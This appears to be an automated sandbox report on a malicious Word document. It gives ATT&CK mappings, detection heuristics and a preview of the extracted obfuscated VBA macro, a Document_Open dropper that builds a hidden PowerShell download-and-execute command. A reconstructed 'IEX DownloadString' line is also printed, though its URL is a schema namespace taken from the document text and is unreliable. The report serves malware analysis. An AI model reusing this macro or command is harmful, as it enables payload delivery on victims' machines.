MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, which utilizes the Shell() function. This function is used to execute a command that downloads and runs a second-stage payload from a hardcoded URL. The reconstructed command is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://schemas.openxmlformats.org/drawingml/2006/main')"'. This indicates a dropper or downloader functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6605274-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6605274-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17764 bytes |
SHA-256: 1115ba3f137a65247c78a2988c1ca151cdd529177a5dd96c22696cac96fdf756 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RbGMfWlL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
HTWurY = bzHOT + JBjYVu - jsAChr / tAqdiK / (tMNPh - tJVzS + bzFYEE + svOTTN + bbbIdj + jQoWI)
rZXCk = QznbmY + RLitt - hvRiN / ibrjQ / (vQCBW - QjSjin + WEfrYl + dGHcZq + hBUZO + ZqICQ)
cJjwQd = qQDjSz + ZpJZb - hihwKP / ajwcb / (zTTXJL - ITRwkG + BABzc + KEtcln + MIJUa + jwCFR)
Szujz = Inqct + jCzji - aWJEc / jiCzW / (TLmjj - iwzld + EzzOlI + QfazFN + XfCUM + QlIik)
PisERztMcECk ("" + WORjODwPZfw + ZuZqlVKiAJzX + adsKEhCz + WsWTjwBfj + BiwiqDWF + EhZpsXziRRtu + ZtNjTRs)
dYRVSp = dinDM + BIMqOt - lbSzK / PUEkD / (FowQaC - oCoLHI + bsFUdD + lICGSK + auZzj + GJErm)
EKzQLr = kXOjH + pUjuK - raOIO / XtnSn / (hoVva - lvatW + fpqiZ + cKhdwG + CiDnzi + jBBSf)
VIOhwE = cZWpU + pcjEs - FXciI / OFTinY / (irHCT - wCiaJj + ddbHUz + QpXsZ + Ejwsz + zmqJiZ)
End Sub
Attribute VB_Name = "uMawTCKz"
Function adsKEhCz()
On Error Resume Next
GLZcC = iWZFGt - CsfkNZ - (98173 * zXUZtd * 19855 / FpImh)
sXqMwi = fDFaLz - PkCdTH - (76224 * CJWTw * 38351 / zGzPz)
XMAwV = QTSSMo - FFJNfF - (75170 * hqikJ * 30653 / zcwww)
KcNwzBzRDzO = "p" + cVlupiqDHJiJs + ktzspWVOMcJU + "ow" + OsnsPhsuKz + mXafGOCsMEzJX + "ers" + HZSfOAhs + RcPspjBHwjznj + "h" + RzKKviUvZkVsSX + fJoolmA + "e" + vCYkJTsvjw + iWLwhpHUqj + "ll " + iSishJfw + zcvKQRcwibnhw + "( " + sEztBiMSRFq + NZRHjtWjAWYprt + "n" + UzWrPpFh + KnJiFacdjIKf + "E" + QtrhYDJ + KwITwkXU + "W"
zjjaV = wNOKr - oATaWw - (45814 * wcZaw * 66259 / GdsLoa)
TjTVQa = vaUNHH - XNZwZ - (11598 * JIbnU * 83095 / VzCWNA)
QQAYvQKq = "-o" + dHjIhwG + oGGilsBViJY + "b" + viGZbRqtHziK + qznLCpMfkdrNK + "JeC" + WqVLuLACIXovh + cUpDKXrw + "t " + VPwchNG + kJIwBdq + " SY" + nNufwdBXYHK + szJZwBZaKha + "S" + zTVnaUcMKIHqRV + pzKjFRJo + "TEM"
oVEdjT = BfhBkh - sThrCj - (59020 * zPUiQz * 83011 / KjLtjH)
zIzfu = ".IO" + nqPquJERUnm + msCIXoIzD + "." + wXVZoJkL + OsOpDGQQw + "CO" + zrtSqYj + ikqFrWnfdL + "Mp" + jDXAnSThshH + BjbGzkA + "re" + kiCJwhTlnkI + oWSDGQljz + "S"
AqqLY = aCiHSs - iTlOHt - (43468 * bnrFou * 58912 / HvnCzJ)
RfZKYWw = "s" + MHKGvFVd + miWZDFXYDw + "IO" + lvRaMfqwVMuH + LYfhWbTVsFkV + "N.d" + ckEsAbWPpUtpnW + kOiQtwsVbiQ + "E" + MpqutWk + GSPwjKo + "Fla" + zRRVWrTCdrjRV + LcfCvtAT + "te" + HMBzPhhuqTzl + zbrssYklHI + "Str" + flluzwwm + SFNKBWfrJal + "e" + TCHavwW + MICvJvWwmEFUI + "aM" + iWNFQzKUUiS + YDnraatFHFNkV + "([" + hFiKQcrYlRosB + MqCjajROuisZ + "SYS"
NQFhnF = (42601 / AADfbX * 88296 / lIHow)
zVupX = OAHbNj - CalhrQ - (49072 * WhpkEP * 84164 / cYCQIl)
DiATMj = SuEPnI - AIBXd - (77404 * ESXWM * 59896 / KPWQi)
bOnohQm = "tE" + zEYIihwJPWnsvq + jOSXSjDfQzlI + "m.I" + fBnIhih + SCuQFkBT + "o" + ZEjtFiSAs + wqlLqlEnIGA + ".m" + zUXQzvP + pwzwHidOipWjW + "EmO" + EPwzjmLY + ukHCDzcwFAn + "R" + iVKtYLzWdIOMiw + EdZQQNzWMfrtiQ + "y" + sVUbVsnMjJ + sqUBKwBXNvd + "St" + ohtTFoMztU + qiLqMhHwViW + "RE" + jjOnHwsDChLtt + EiwVHZTUqh + "a" + WUDJLidWF + mXUYnwAw + "m] "
mrqfA = (5903 / POYGG * 67479 / jzXzK)
PlUbowA = "[SY" + GVLwmBfYp + JjcMdKfMHqZC + "st" + zpoYAlEzXlVTB + jqiWZZlGm + "Em" + iDwYjSjKnMrAp + LMrrKIPwYAr + ".co" + ONiBiLGB + EDnrdErptXwNZO + "Nv" + jPGaXplZvZdq + rbNNmoWRmsh + "e" + JKBoTFufruYbPR + DaAUPfUALbHNPd + "r" + MrcPulJkbwAjo + WIUiRjqidp + "T]" + rwjPOjfPXpw + QQsRfnLZE + ":" + uuwNVJw + ISmuimAJWAjJTQ + ":" + wQzBpDnNb + jRtNrYHKwi + "frO" + tnBDDEwbivzX + YEEiYTN + "Mb" + sdmpkLFCl + ENnAkJiupoUW + "Ase" + zDFUFdUbWJZQO + YtLWJwKRE + "64" + pTdcXHRzk + hfXNdqd + "st" + uSiQuIzLuo + aqoBwum + "RI" + PbGYLjzvSTniaU + MhPHGEvWzHpiM + "ng(" + rHUfrYrjcAPbUz + VSNlNWKsKfjZEq + " 'R"
nXwXGp = (58636 / UwmHr * 57250 / ZdITQz)
UwbUMo = (35302 / lifnzB * 98109 / jnwROj)
IiKnEsqFbC = "V" + EKwwWBjuobai + cCTAYLqdX + "Dba" + ncCcUltan + WjPhvtIaYOL + "g" + OviiqqanSh + hRUqjEhJwj + "Ix" + rPzUwFz
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.